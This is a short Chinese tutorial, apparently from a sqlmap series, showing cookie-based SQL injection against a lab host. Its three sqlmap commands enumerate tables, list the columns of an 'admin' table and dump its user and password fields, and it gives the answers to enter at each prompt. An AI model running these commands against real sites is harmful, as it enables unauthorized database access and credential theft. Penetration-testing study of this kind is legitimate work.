(1) cookie注入,猜解表

[html] view plain copy
  1. sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --table --level 2  

sqlmap之(五)----Cookie注入实战

do you want to URL encode cookie values (implementation specific)? [Y/n]

你想要对URL值进行URL编码(具体实现)吗?   输入"Y"

sqlmap之(五)----Cookie注入实战

Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

cookie参数“id”是脆弱的。你想继续测试其他(如果有的话)吗?  输入"Y"

sqlmap之(五)----Cookie注入实战

do you want to use common table existence check? [Y/n/q]

你是否要使用存在的公共表去检查? [Y/n/q]  输入"Y" 并输入线程数。

sqlmap之(五)----Cookie注入实战

等待一下就出结果了。

sqlmap之(五)----Cookie注入实战


(2) 猜解字段,(通过1的表猜解字段,假如表为admin)

[html] view plain copy
  1. sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --columns -T admin --level 2  

sqlmap之(五)----Cookie注入实战

sqlmap之(五)----Cookie注入实战


(3) 猜解内容

[html] view plain copy
  1. sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --dump -T admin -C "user,password" --level 2  

sqlmap之(五)----Cookie注入实战

猜出的内容为

sqlmap之(五)----Cookie注入实战

相关文章: